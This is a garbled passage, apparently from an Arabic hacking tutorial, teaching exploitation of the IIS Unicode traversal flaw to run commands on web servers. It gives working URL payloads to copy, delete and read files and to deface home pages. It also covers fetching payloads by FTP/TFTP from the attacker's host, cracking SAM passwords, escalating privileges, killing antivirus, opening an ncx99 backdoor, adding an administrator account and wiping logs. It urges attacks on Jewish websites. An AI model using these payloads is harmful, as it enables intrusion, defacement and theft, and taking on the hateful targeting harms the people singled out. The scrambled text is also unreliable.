‬‬ ‫انتهى‪،،،‬‬ ‫‪120‬‬ .‫‪ 5‬لبدء الفحص‬ ‫‪ 6‬لليقاف‬ ‫‪ 7‬شاشة العمليات الجاريه من فحص الثغرات على الموقع‬ ‫‪ 8‬الثغرات الموجوده على الموقع التي نجح اختبارها‬ ‫‪ 9‬لمسح شاشه العمليات و النتائج لعاده البحث مره اخرى على ثغرات اخرى‬ ‫‪ 10‬ال‬ ‫‪ 11‬منفذ ال‬ ‫ملحظ ‪11 10 :‬‬ ‫اذا ما عرفت ال فيجب عليك مسح البيانات‬ ‫‪ 12‬للخروج‬ ‫ملحظه هامه ‪:‬‬ ‫ل تنسو المواقع اليهودية التي تنتظر من يخترقها فأرجو عدم استخدامه ضد الموقع العربية او السلمية‪.

‬‬ ‫‪-‬‬ ‫‪121‬‬ . TFTP‬‬ ‫مسح ملفات اللوق حتى ل يتم التعرف عليك ‪. CMD‬‬ ‫‬‫طريقة تطبيق هذه الثغرات ‪.‫" الختراق عن طريق اليونيكود )الجزء الول( "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪<sNiper_hEx :‬‬ ‫يحتوى الدرس الول على ) ‪ 13‬نقطة ( وهي كما يلي ‪-:‬‬ ‫تعريف باليونيكود ‪.‬‬ ‫‬‫كيف يتم استغلل ثغرات اليونكود ‪.‬‬ ‫‬‫كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ‬ ‫‬‫‪.‬‬ ‫‬‫كيفية ايجاد هذه الثغرات ‪. FTP‬‬ ‫‬‫طريقة كشف باسورد الدمينستريتور ‪.‬‬ ‫‬‫تاريخ ظهور هذه الثغرة ‪.‬‬ ‫‬‫تغيير الصفحة الرئيسية للموقع وعملية الب لوود بواسطة‬ ‫‬‫برنامج ‪.‬‬ ‫‬‫الوامر المستخدمة بواسطة ملف ‪.‬‬ ‫ كيفية معرفة مشكلة الـ ‪ Access Denied‬والحلول المتبعة لها ‪. ECHO‬‬ ‫طريقة نسخ ملف الـ ‪ CMD‬لتاحة امكانية الكتابة على الملفات‬ ‫‬‫‪.‬‬‫كيفية عمل اكاونت للدخول بواسطة الـ ‪.

exe?/c+del+c:\hEx.‬امر الغاء دليل‬ ‫‪%c0%af.exe+c:\inetpub\scripts\hEx./winnt/system32/cmd.‬‬ ‫ددددد ددددد ددد ددددددد ‪.com/msadc/...%c0%af.com/msadc/..txt‬‬ ‫‪:‬المر المستخدم لعملية سحب أي ملف‬ ‫‪122‬‬ ...com/msadc/./winnt/system32/cmd./winnt/system32/cmd.xxxx.mdb‬‬ ‫‪: http://www.. NT4 / Win2k‬‬ ‫‪IIS4.exe+c:\inetpub\scripts\hEx.com/msadc/.‬امر انشاء دليل جديد‬ ‫‪%c0%af.exe?/c+move+c:\winnt\system32\cmd../.htm‬‬ ‫‪: http://www.‬المر المستخدم لتغيير مسمى الملفات‬ ‫‪%c0%af.‬‬ ‫ددددددد ددددددددد دددددد ددد ‪.‬‬ ‫‬‫عند تطبيق الثغرة على نظام الـ ‪ IIS4 / IIS5‬يبدا ملف ‪CMD‬بفك شفرة اليونكود في المثال الخطاء‬ ‫ومن هنا يتم استغللها ‪..‬‬ ‫‬‫ليوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول ‪anonymous‬‬ ‫‪ ، person‬وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن ليوجد مايثبت صحة هذا الكلم‬ ‫لهذه الثغرات ‪ ،‬فتم استغلل هذه الثغرات من قبل المخترقين وتطوير البرامج اللزمة لها ‪.‬‬ ‫‬‫اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع‬ ‫والذي ياتي عادة مع ‪./...xxxx.‬‬ ‫‪%c0%af.‬‬ ‫‪-2‬‬ ‫ددد ددد ددددددد ددددد دددددددد ‪.exe?/c+ren+c:\index.exe?/c+type+c:\hEx..com/msadc/.ex‬‬ ‫‪e‬‬ ‫‪:‬المر المستخدم للنقل‬ ‫‪http://www.%c0%af.‬المر المستخدم لرؤية محتويات الملف‬ ‫‪%c0%af.xxxx.txt‬‬ ‫‪:‬المر المستخدم للكتابة داخل أي ملف‬ ‫‪http://www./winnt/system32/cmd./.xxxx.exe?/c+md+c:\hEx‬‬ ‫‪: http://www.exe?/c+echo+sNiper_hEx+>c:\hEx.xxxx.e‬‬ ‫\‪xe+c:‬‬ ‫‪: http://www.%c0%af...com/msadc/.xxxx.%c0%af..exe?/c+rd+c:\hEx‬‬ ‫للمعلومية‪:‬ليمكن الغاء أي دليل ال اذا كان فارغا ً تمام من الملفات والمجلدات‬ ‫‪:‬المر المستخدم للنسخ‬ ‫‪http://www.‬‬ ‫بواسطة تطبيق الثغرة على الموقع مباشرة ‪./...0‬‬ ‫ددددد دددد ددد دددددد ‪.‬‬ ‫‪%c0%af./..‬المر المستخدم للحذف‬ ‫‪%c0%af..‫ددددد دددددددددد ‪..%c0%af.. CMD‬‬ ‫‬‫الوامر المستخدمه بواسطة ملف الـ ‪ CMD‬وهي امر لنشاء دليل جديد وامر للغاء دليل وامر النسخ‬ ‫وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي‬ ‫ملف وامر لسحب أي ملف ‪ ،‬وهي حسب المثلة التالية ‪-:‬‬ ‫‪: http://www./winnt/system32/cmd.com/msadc/.htm+hEx..xxxx./winnt/system32/cmd.../winnt/system32/cmd.com/msadc/....0 / IIS5.‬‬ ‫‪%c0%af.exe?/c+copy+c:\winnt\system32\cmd./winnt/system32/cmd.‬‬ ‫‬‫يتم ايجاد هذه الثغرات بطريقتين ‪-:‬‬ ‫بواسطة البرامج اللزمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي‬ ‫‪-1‬‬ ‫تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس ‪.xxxx.

com/scripts/.exe?/c+dir+c‬‬ ‫‪\:http://www.xxxx.htm‬بحيث يكون المر بالشكل التالي ‪-:‬‬ ‫‪http://www...exe‬‬ ‫الى مجلد‬ ‫‪inetpub\scripts‬‬ ‫والمر يكون بهذه‬ ‫?‪http://www.%c0%af.com/msadc/hEx.exe‬‬ ‫‪c+copy+c:\winnt\system32\cmd.xxxx.. scripts . cgi-bin‬‬ ‫ددددد دددددد دددد ددددددددد ددد ددددد دد ددددد ددد‬ ‫‬‫ددد ‪.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.%c0%af.exe‬‬ ‫‪c+copy+c:\winnt\system32\cmd../winnt/system32/cmd..exe?c+dir+c‬‬ ‫ ددددد ددددد ددددد ددد ‪ Access Denied‬ددددددد ددددددد ددد ‪./...%c0%af.exe?/c+dir+c‬‬ ‫‪\:http://www.%c1%9c.%c0%af.xxxx..com/scripts/./winnt/system32/cmd..com/scripts/. iisadmpwd .%c0%af.com/msadc/.xxxx.%c1%1c. _vit_admin .exe‬‬ ‫الن بامكاننا استخدام ملف الـ ‪ CMD‬الجديد في الثغرة بدل من الول بهذا الشكل ‪-:‬‬ ‫‪\:http://www..exe‬‬ ‫بعد نسخ ملف ‪ w3svc..exe+c:\inetpub\scripts\cmd1. ECHO‬‬ ‫في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه‬ ‫الثغرة ‪-:‬‬ ‫‪\:http://www.com/msadc/./winnt/system32/cmd.exe+c:\inetpub\scripts\w3svc.‬‬ ‫‬‫تطبيق الثغرة على الموقع من خلل المتصفح تتم حسب المثلة التالية ‪-:‬‬ ‫‪\:http://www.%c0%af.com/scripts/./winnt/system32/cmd.com/scripts/./winnt/system32/cmd.. _vti_bin ./.htm‬‬ ‫ددددد ددد ددد ـــ‬ ‫‬‫ددددددد ‪./winnt/system32/cmd..‬‬‫تتم معرفة مشكلة الـ ‪ Access Denied‬من خلل المحاولة في حذف أي ملف من أي امتداد ‪ ،‬فعند‬ ‫ظهور رسالة الـ ‪ Access Denied‬فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم‬ ‫اكثر على السيرفر ‪-:‬‬ ‫الطريقة الولى نسخ ملف الـ ‪ CMD‬الى دليل السيكربت بمسمى ‪ CMD1‬فسوف يتاح لك‬ ‫‪-1‬‬ ‫امكانية الكتابة باستخدام المر ‪ Copy‬باستخدام هذا المر ‪-:‬‬ ‫‪123‬‬ ..‫عليك القيام اول ً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف‬ ‫‪:‬في اخر العنوان كالتالي‬ ‫‪http://www.%c0%af.%c0%qf.exe?/c+dir+c‬‬ ‫‪\:http://www.xxxx..exe?/c+dir +c‬‬ ‫وقد نحتاج الى تغيير مسمى الدليل بحيث يكون ‪-:‬‬ ‫‪Msadc .com/scripts/.xxxx.xxxx..com/msadc/.xxxx.mdb‬‬ ‫ددددد ددددد ددد ددددددد ‪.exe?/c+dir+c‬‬ ‫الن نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا‬ ‫مايكون في هذا الدليل‬ ‫‪ inetpub\wwwroot\index../winnt/system32/cmd../winnt/system32/cmd1.com/scripts/w3svc.exe?/c+dir+c‬‬ ‫‪\:http://www.exe?/c+dir+c‬‬ ‫‪\:http://www.%c0%9v.%c1%pc.xxxx.xxxx.‬‬ ‫الغرض من نسخ ملف الـ ‪ CMD‬وهو لعطاء امكانية للكتابة داخل السيرفر في بعض الحالت ويتم نسخه‬ ‫الى مجلد السيكربت بهذه الطريقة ‪-:‬‬ ‫‪CMD‬‬ ‫دددددد ددددددد ددددددد ددد‬ ‫?‪http://www...exe‬الى مجلد‬ ‫خلل الثغرة بهذه الطريقة ‪-:‬‬ ‫‪inetpub\scripts‬‬ ‫‪ ،‬الن نقوم بتصفح الموقع من‬ ‫‪\:http://www..co‬‬ ‫‪m+>+c:\inetpub\wwwroot\index. samples .xxxx.exe?/c+dir+c‬‬ ‫‪\:http://www.....exe?/c+dir+c‬‬ ‫فنحتاج الى نسخ ملف‬ ‫الطريقة ‪-:‬‬ ‫‪w3svc./winnt/system32/cmd.%c1%8s...xxxx././winnt/system32/cmd.xxxx...%c0%af../.com/scripts/w3svc.xxxx./winnt/system32/cmd.com/scripts/.com/msadc/.%c0%af.

‬‬ ‫البحث عن ملفات ‪ root.exe?+"-s:c:winnt\mspft.exe‬بحيث يتم عمل اب لوود لهذا الملف داخل مجلد‬ ‫‪-3‬‬ ‫الـ ‪ Temp‬في دليل الويندوز ومنه يتم تنفيذ الوامر من خلل موجة الدوز وللمعلومية مجلد الـ ‪Temp‬‬ ‫مفتوح لعمليات الب لوود ‪./winnt/system32/cmd.html+>>+c:\winnt\mspft.ppl/‬‬ ‫الن مطلوب ادراج البريد ‪ hExRay@Hotmail.exe :‬ونسخها الى مجلد‬ ‫‪-5‬‬ ‫‪ c:\inetpub\scripts‬وتطبيق الثغرة من خللها ‪.exe+c:\inetpub\scripts\shell.xxxx.exe ، w3svc.ppl‬وهو عبارة عن خطوات قمنا بانشاءها‬ ‫وموجودة في ملف ‪ mspft..%c0%af.com‬حيث ان هذا هو الخادم للـ ‪.ppl/‬‬ ‫الن يكتب اوامر الـ ‪ FTP‬اللزمة لسحب الملف من خادم الـ ‪ FTP‬وهي ‪ Get index.host.com‬‬‫ ‪Anonymous‬‬‫ ‪hEx@Hotmail.exe ، sensepost.exe?/c+echo+quit+>>+c:\winnt\mspft.‬‬ ‫‬‫‪-1‬‬ ‫قديمة‬ ‫ددددد ددد دددددد دددددد دددددد ددد ‪.pll‬‬ ‫‪shell.xxxx.Com‬الى نفس الملف الذي قمنا بانشاءه‬ ‫‪-4‬‬ ‫‪mspft.exe?/c+echo+get+index.g‬‬ ‫‪shell.exe?/c+echo+hEx@Hotmail.‫?‪http://www.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.shtml‬‬ ‫‪o‬‬ ‫كتابة هذا الكود داخل الصفحة >!‪ <--"include file="AAAA[.exe+c:\inetpub\scripts\cmd1. FTP‬‬ ‫‪c+echo+open+ftp.‬‬ ‫الطريقة الثالثة باستخدام برنامج ‪ NC.Com‬‬‫‪User Anonymous -‬‬ ‫‪124‬‬ .com+>+c:\winnt\mspft.‬‬ ‫‪o‬‬ ‫الن تستطيع الكتابه وتم تخطي مشكلة الـ ‪.Com+>>+c:\winnt\mspft. FTP‬‬ ‫نسخ ملف ‪ CMD‬الى مجلد ‪ Scripts‬باسم ‪ Shell.ppl/‬‬ ‫الن تكرار لحاجة العداد‬ ‫‪-6‬‬ ‫‪shell../.pll‬‬ ‫‪-5‬‬ ‫‪shell.com/msadc/.htm‬ثم‬ ‫‪-8‬‬ ‫يدرج هنا بدون المسج السابق‬ ‫‪shell.shtml‬‬ ‫‪o‬‬ ‫الن سوف تظهر لك الصفحة ‪.dll‬والطريقة كما يلي ‪-:‬‬ ‫‪-2‬‬ ‫اول انشاء صفحة باسم ‪test.‬‬ ‫الن يتم طلب الصفحة من خلل المتصفح ‪http://www.com/test.pll‬بواسطة المر ‪ Echo‬وكتابة فيه التالي ‪open‬‬ ‫‪-2‬‬ ‫‪ ftp..ppl/‬‬ ‫هنا نفس السابق ولكن باضافة ‪Quit‬‬ ‫‪-9‬‬ ‫‪shell.exe/‬‬ ‫انشاء ملف ‪ mspft. Access Denied‬‬ ‫‪o‬‬ ‫اذا ظهرت لك صفحة الخطاء رقم ‪ 500‬فمعناها انك لم تقم بتطبيق الطريقة‬ ‫‪o‬‬ ‫بالشكل الصحيح وعليك اعادة المحاولة ‪.%c0%af.Com+>>+c:\winnt\mspft.exe?/c+echo+anonymous+>>+c:\winnt\mspft.exe‬‬ ‫الطريقة الثانية بالتعامل مع الملف ‪ ssinc.ppl/‬‬ ‫الن مطلوب اضافة مجهول ‪ Anonymous‬الى نفس الملف الذي قمنا بانشاءه‬ ‫‪-3‬‬ ‫‪mspft.host.pll‬‬ ‫‪shell.ppl/‬‬ ‫إضافة ‪ User‬قبل ‪ Anonymous‬لزوم الملف الذي قمنا بانشاءه ‪mspft.exe ، shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft...shtml‬‬ ‫‪o‬‬ ‫تكون هذه الصفحة داخل مجلد ‪wwwroot/hEx/test..ppl/‬‬ ‫يتم هنا ادراج الموقع الحالي للملفات‬ ‫‪.]AA#--‬بحيث ان‬ ‫‪o‬‬ ‫حرف ‪ A‬يتم كتابتة حتى يتعدى ‪ 2049‬حرف ‪.host.exe‬‬ ‫‪c+copy+c:\winnt\system32\cmd.ppl‬باحتوائها على مايلي ‪-:‬‬ ‫ ‪Open FTP.‬‬ ‫الطريقة الرابعة وهي من خلل عمل كراش للسيرفر باستخدام البرامج اللزمة لهذا‬ ‫‪-4‬‬ ‫الغرض وهذه الطريقة غير مجديه في كثير من الحيان ‪.exe?/c+echo+hEx@Hotmail.exe‬حتى يتم الستفادة من ثغرة‬ ‫‪c+copy+c:\winnt\system32\cmd.ppl/‬‬ ‫‪ -10‬الن يتم تنفيذ امر ‪ ”FTP.

Com‬‬ ‫‪-‬‬ ‫‪Get index.html‬‬ ‫‪-‬‬ ‫‪Quit‬‬ ‫‪"msadc/.‬‬ ‫‬‫نحتاج الى وجود برنامجين ) ‪ ( Microsoft Access – L0phtCrack‬وهي لزوم تنفيذ بعض‬ ‫الخطوات لتالية وهي ‪-:‬‬ ‫باسورد الدمينستيتور للسيرفر يكون موجود في ملف الـ ‪ _.exe?+"-s:c:\winnt\mspft.SAM‬في دليل \‬ ‫‬‫‪ \winnt\repair‬وافضل برنامج لفك شفرة الباسورد هو برنامج ‪ L0phtCrack‬كما هو موضح بالشكل‬ ‫التالي‪-:‬‬ ‫اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في‬ ‫‬‫ملف ‪ PASSFILT.ppl/‬‬ ‫ددددد ددد دددددد دددددددددددددد ‪...inc‬وقراءة محتوياته للعثور على اسم‬ ‫المستخدم والباسورد للمسئول عن قاعدة البيانات ‪..DLL‬‬ ‫اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ‪ ASP‬للوصول الى البيانات من‬ ‫‬‫الـ ‪ MySQL‬فسوف نحتاج الى تطبيق ثغرة ) ‪ ( htr./.%c0%af.‫‪-‬‬ ‫‪hEx@Hotmail.%c0%af.com/default.‬‬ ‫ددددد دددددد دددددددد دددددد دددددد دددد دددد‬ ‫‬‫دددددد دددددد ‪.asp+./winnt/system32/ftp.‬‬ ‫‪125‬‬ .+‬للوصول الى باسورد‬ ‫خلل قاعدة‬ ‫المسئول عن هذة القاعده وهي كالتالي ‪-:‬‬ ‫‪http://www. TFTP‬‬ ‫‪ -1‬قم بانشاء صفحة وضع شعارك عليها واحفظها باسم ‪ index.htr‬‬ ‫عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة‬ ‫صحيحة وماعلينا فقط سوى سحب ملف ‪ database.htm‬على الـ ‪\:c‬‬ ‫‪ -2‬قم بتشغيل برنامج ‪ TFTP‬ونفذ المر في الفقرة التالية ‪.xxxx..DLL‬ونستطيع تحديد مسار هذا الملف من خلل الريجستري بواسطة هذا المفتاح ‪-:‬‬ ‫‪HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.

htm/‬‬ ‫وهو البرنامج اللزم لعمل الب لوود ويجب ان يكون شغال في حالة تنفيذ المر‬ ‫‪tftp.log/‬‬ ‫انتهى ‪،،،‬‬ ‫" الختراق عن طريق اليونيكود )الجزء الثاني( "‬ ‫‪126‬‬ .exe+"-i"+1.‫‪c+tftp.htm‬‬ ‫اسم الدليل في السيرفر‬ ‫\‪\inetpub\wwwroot‬‬ ‫اسم الملف على السيرفر‬ ‫‪index.1.1+GET+index.htm‬‬ ‫ددد ددددد ددددد ددد دد ددد دددددد دددد ‪.1‬‬ ‫وهو المر اللزم لطلب الملفات مابين الرسال والستقبال‬ ‫‪GET‬‬ ‫اسم الملف بجهازك‬ ‫‪index.1.‬‬ ‫‬‫وتتم هذه العملية من خلل حذف ملفات الـ ‪ Log‬من مجلد ‪ System32‬بواسطة المر ‪-:‬‬ ‫‪c+del+c:/winnt/system32/logfiles/*.exe‬‬ ‫وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات‬ ‫"‪"i-‬‬ ‫رقم اليبي الخاص بك‬ ‫‪1.1.htm+C:\inetpub\wwwroot\index.1.

‬‬ ‫‪Kill.exe‬والسبب هو تفعيل امر الكتابة ‪.exe‬‬ ‫‪ncx99..‬والفائده منها هو اقفال الفايروول ‪ +‬النتي‬ ‫فايروس ‪(:‬‬ ‫‪ Kill.exe‬‬ ‫‪Tlist.exe -3‬عملها متمم للداة السابقة حيث ستقوم باقفال رقم العملية المستخرج من الداة السابقة ‪.. IIS‬‬ ‫وبما انه من مجموعة ‪ Guest‬فهو ل يملك صلحيات كثيرة !! ال اذا تم اعداده بشكل سيء ‪(:‬‬ ‫ليوجد شي اكثر ادمانا من محاولة الحصول على رووت ‪ (:‬هذا في انظمة *‪ nix‬اما في ‪Microsot‬‬ ‫فالوضع مختلف ‪ (:‬فإن محاولة الحصول على صلحيات ‪ Administrator‬ليس بالسهولة التي تتوقعها ‪(:‬‬ ‫فرفع المتيازات بشكل محلي في انظمة مايكروسوفت ممكن فقط بطرق قليلة ل يتعدى عددها اصابع اليد‬ ‫الواحده ‪ .exe‬‬ ‫‪tftpd32. (:‬‬ ‫لتوفير الوقت جمعتها في مجلد واحد هنا‬ ‫الن سأشرح عمل كل اداة ‪:‬‬ ‫‪ Sechole .1‬وهو اقوى استثمار موجود لرفع المتيازات بشكل محلي ‪ .2‬تقوم بعرض جميع العمليات التي تعمل بالخلفيه ‪ .‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫في الدرس الول كان عبارة عن اوامر اساسية يستطيع الجميع تطبيقها ‪ .. (:‬‬ ‫‪ Tlist .‬من خلل هذه الثغرة فانه سيكون لديك صلحيات‬ ‫‪ IWAM_USER‬وهذا المستخدم هو عبارة عن يوزر ينتمي للمجموعه ‪ Guest‬وهو اليوزر المسؤوول‬ ‫عن تشغيل سيرفر ‪.exe -4‬لنقل الملفات الى السيرفر ‪...exe‬‬ ‫جهز العده ‪.‬وانا اكتب هذا الموضوع لشرح كيفية احكام السيطرة على السيرفر والحصول على حساب مكافيء‬ ‫للمدير ‪ (:‬والتمتع بجميع موارد النظام ‪.‬اما في هذا الدرس فالمر يتطلب‬ ‫بعض الذكاء والمهارة ‪.‬وطريقة عمله )بشكل مبسط(‬ ‫بأنه يعتمد على صدع في نواة ويندوز ان تي ‪ .exe‬وملحقاتها ‪.exe‬هذا شي يعرفه الجميع ( لكن للتذكير فقط !‬ ‫الن عند تصفحك لملفات الموقع من المتصفح ‪ ... Echo‬‬ ‫وبعد ذلك نفذ الثغرة من الملف الجديد ‪ ) CMD1...‬‬ ‫‪ NCX99 -3‬نسخه مطورة من الباكدوور ‪ NC‬ينصت على المنفذ ‪99‬‬ ‫‪ TFTP32.‬يستطيع من خلله اغتصاب عملية تابعه لمدير النظام يقوم‬ ‫من خللها برفع امتيازاتك ‪..‬‬ ‫البداية ‪:‬‬ ‫‪-------------‬‬‫عند وجود موقع مصاب بثغرة ما )يونيكود( فان اول شي عليك القيام به هو نسخ مجلد ‪ cmd‬الى ‪cmd1‬‬ ‫بهذه الطريقة ‪:‬‬ ‫‪+C+copy+c:\winnt\system32‬‬ ‫‪ c:\winnt\system32\cmd1.‬‬ ‫‪ +‬الملفات المطلوبة ‪:‬‬ ‫‪ Sechole..‬‬ ‫‪127‬‬ .

..‬‬ ‫بما اننا لدينا حساب مكافي لـ ‪ Administrator‬ولكننا ل نملك كلمة المرور ‪ .....‬لكن يوجد ماهو اسهل ‪. TLIST‬ستعرض لك جميع العمليات التي تعمل ‪ .À¯.. Access Denided‬‬ ‫وطبعا اهم شي الكتابة على الصفحه الرئيسية بامر اليكو ‪:‬‬ ‫‪+C+Echo+Hacked+by+XDeMoNX‬‬ ‫< ‪C..exe‬من المتصفح ‪...exe PID :‬مكان ‪ PID‬تضع رقم العملية ‪(:‬‬ ‫يسأل البعض ! مالهدف من اقفال النتي فايروس ؟ الجابة ‪ .bat‬ثم تشغيلها من المتصفح )بواسطة اليونكود(‬ ‫الن لديك حساب مدير ‪ (:‬وتستطيع الدخول الى اي خدمه ‪ ..‬‬ ‫عندها سيتم رفم امتيازات ‪ IWAM_USER‬الى مجموعه ‪.‬فانك ستجد من المنافذ ما يسر‬ ‫القلب ‪(:‬‬ ‫‪ 90%‬من السيرفرات اللي دخلتها وكانت محمية بجدران نار ‪ (:‬وجدت المنفذ ‪ 139‬فيها مفتوحا بدون حمايه‬ ‫‪128‬‬ .. KILL.‬إلخ ‪(:‬‬ ‫سؤال ‪ :‬هل تستطيع الدخول بهذا اليوزر ؟ ‪ IWAM_USER‬الى اي خدمه مثل تلنت او اف تي بي ؟؟‬ ‫الجابة ‪ :‬ل ‪ . Guest‬‬ ‫الن قم بتشغيل الداة ‪ ...‬اف تي بي او تلنت او نت بيوس او غيرها ‪(:‬‬ ‫ل تنسى في النهاية مسح الثار واضافة البواب الخلية الخاصة بك لتسهيل الدخول في المرات القادمه ‪(:‬‬ ‫طبعا لن اتوسع في هذا الجانب لنه ) لكل شيخ طريقة!( وكل واحد له اسلوب في اخفاء ادواته والتحكم في‬ ‫الملفات ‪..‬صحيح اننا قمنا برفع امتيزاته لكننا ل نملك كلمه المرور ! لنه تكون مسنده بشكل عشوائي ‪..exe‬‬ ‫بعد ذلك قم بالتصال بالموقع على البورت ‪... 99‬‬ ‫ستحصل على سطر اوامر ‪ CMD‬بدون امتيازات = ‪. add..‬ما رأيك بإضافه يوزر جديد‬ ‫باسمك مع باسورد خاصه بك مع امتيازات المدير ايضا !! ‪ (:‬قليل من الذكاء والتفكير ‪(:‬‬ ‫قم بانشاء مستند نصي جديد واضف السطر التالي ‪:‬‬ ‫‪net user Demon pass /add && net localgroup administrators Demon /add‬‬ ‫والن ‪ Save as‬واحفظها باسم ‪..\inetpub\wwwroot\index+‬‬ ‫‪htm.‬قم بالبحث عن رقم العملية ‪PID‬‬ ‫الخاص بالنتي فايروس ان وجد ‪ .‬‬ ‫نرجع لنقطة سابقة ‪.‫كل ما سبق كان عبارة عن مقدمه ‪ (:‬اما العمل الحقيقي سيبدأ الن ‪:‬‬ ‫اول قم برفع جميع الدوات السابق الى السيرفر ‪.‬‬ ‫هل تذكر اني طلبت منك اقفال الفايروول ؟؟ لماذا ؟‬ ‫لو جربت تنفذ المر ‪ netstat -an‬من خلل سطر اوامر الن سي ‪ .‬‬ ‫سيذهب تفكير البعض الى الحصول على ملف السام وكسره ‪ (:‬هذا ممكن ‪ .‬وكذلك اذا وجدت جدار ناري ‪..‬‬ ‫ثم قم بتشغيل ‪ ncx99.‬والن بعد اتمام العمليات السابقة بنجاح ‪ .‬أن التحديثات الخيرة من انتي فايروس تتعامل‬ ‫مع ‪ Sechole‬على انه باكدور ‪ .‬قم بتشغيل‬ ‫‪ (: Sechole.‬‬ ‫سجل رقم ‪ PID‬الخاص بالنتي فايروس والفايروول على ورقه جانبيه ‪.‬‬ ‫ولكن ليس هذا كل شي ‪.exe‬بهذا الشكل مثل ‪:‬‬ ‫‪http://target/scripts/.‬‬ ‫الن قم بقتل الجراء بالداة ‪ Kill‬بهذا الشكل ‪ ./winnt/system32/cmd1..‬‬ ‫القراصنه الذكياء ل يبحثون فقط عن تغيير الصفحه الرئيسية خصوصا اذا كان الموقع مهم او يحتوي على‬ ‫معلومات او قواعد بيانات ‪ .bat‬‬ ‫توضيح ‪ :‬ما فعلناه سابقا هو انشاء مجلد دفعاتي يقوم بانشاء يوزر جديد ‪ Demon‬وكلمة مرور ‪Pass‬‬ ‫واضافته الى مجموعة الدمنستريتورز ‪ (:‬المدراء ‪. Administrators‬‬ ‫الن بإمكانك تنفيذه جميع الوامر بكامل الحريه وبدون اي مشاكل في الصلحيات ‪..‬‬ ‫قم الن برفع الملف ‪ add.exe?/c+C:\ncx99.

WINvnc‬‬ ‫انتهى‪،،،‬‬ ‫" معلومات عامة عن كيفية الستفادة من ثغرات اليونيكود "‬ ‫‪129‬‬ .‬‬ ‫بالمكان الستعراض اكثر من ذلك بكثير ‪ .‫‪(:‬‬ ‫لذا فان اقفال الفايرول قد يجعل لك اكثر من خيار لسقاط الهدف ‪(:‬‬ ‫اسف على النحو الملء ‪ .‬والتنسيق الـ أي كلم ‪ (:‬واختصار المعلومات ايضا ‪....‬الى درجة الحصول على تحكم رسومي ‪. GUI‬‬ ‫لكن لم يكون لدي الوقت الكافي ‪ ..‬اذا وجدت وقت فراغ فسأكتب عن طرق اخرى وادوات اخرى مثل‬ ‫‪ GEtAdmin‬و ‪ Sechole2‬وكيفية الحصول على تحكم رسومي بواسطه الداة ‪.

..%%35c../winnt/system32/cmd.%255c.<‫>ةةةةة‬ <‫ ةةةة ةةةة‬:‫>ةةةةةة‬ ‫الموضوع يتكلم عن اساليب التحكم في السيرفر عبر اليونيكود مع بعض المتطلبات‬ : ‫الدوات المطلوبه‬ ‫( اداة مسح ثغرات يونيكود‬1 TFTPD ‫( برنامج سيرفر‬2 ‫( معرفة جيده باليونيكود‬3 ================================================= ================================================= ‫( بأمكانك الحصول على ثغرات اليونيكود من العديد من المواقع او من موقعي‬1 /http://www../ \:%255cwinnt/system32/cmd.%255c...exe?/c+dir+c/ \:scripts/..%255c.%255c........exe?/c+dir+c \:scripts/.exe?/c+dir+c MSADC/../winnt/system32/cmd./ \:%255cwinnt/system32/cmd./.%/ \:%35cwinnt/system32/cmd.%255c..%_/ \:%35c.exe?/c+dir+c/ \:msadc/../.%_/ \:%35%63..%%35%63.exe?/c+dir+c MSADC/.%%35c.%252f../.././....%/ \:%35c./winnt/system32/cmd.%%35%63.%%35%63.%255c..exe?/c+dir+c msadc/...%%35%63.%/ \:%35%63winnt/system32/cmd..%/ \:%35%63.././winnt/system32/cmd..%%35%63.%%35c..%255c.%%35%63.exe?/c+dir+c/ msadc/.........../winnt/system32/cmd.%%35c.%25%35%63.%%35c.exe?/c+dir+c/ msadc/../winnt/system32/cmd..%25%35%63..%255cwinnt/system32/cmd.%255c..%255c.../ %25%35%63..../ %25%35%63..com (( ‫وهذه مهداه مني انا )) بلك هنتر‬ \:msadc/....%%35c.exe?/c+dir+c vti_bin/..exe?/ \:c+dir+c MSADC/..%255c./.%255c./.../.devil2k.%252fwinnt/system32/cmd....%255c.....exe?/c+dir+c msadc/.%25%35%63.%25%35%63.%252f../..%25%35%63./._/ \:%255c.%255c..exe?/ \:c+dir+c msadc/.exe?/c+dir+c MSADC/./winnt/system32/cmd.../winnt/system32/cmd.%252f./ %25%35%63.exe?/c+dir+c 130 ...exe?/c+dir+c/ \:scripts/.%255cwinnt/system32/cmd.%%35c.%255c.exe?/c+dir+c msadc/.%%35%63.%25%35%63winnt/system32/c \:md.%%35c../winnt/system32/cmd...../..%25%35%63.%255c.%25%35%63winnt/system32/c \:md.%%35c..exe?/c+dir+c vti_bin/....%%35%63../ %25%35%63...%255c.%25%35%63.%%35%63.%25%35%63.%255c...%255c.exe?/c+dir+c vti_bin/.

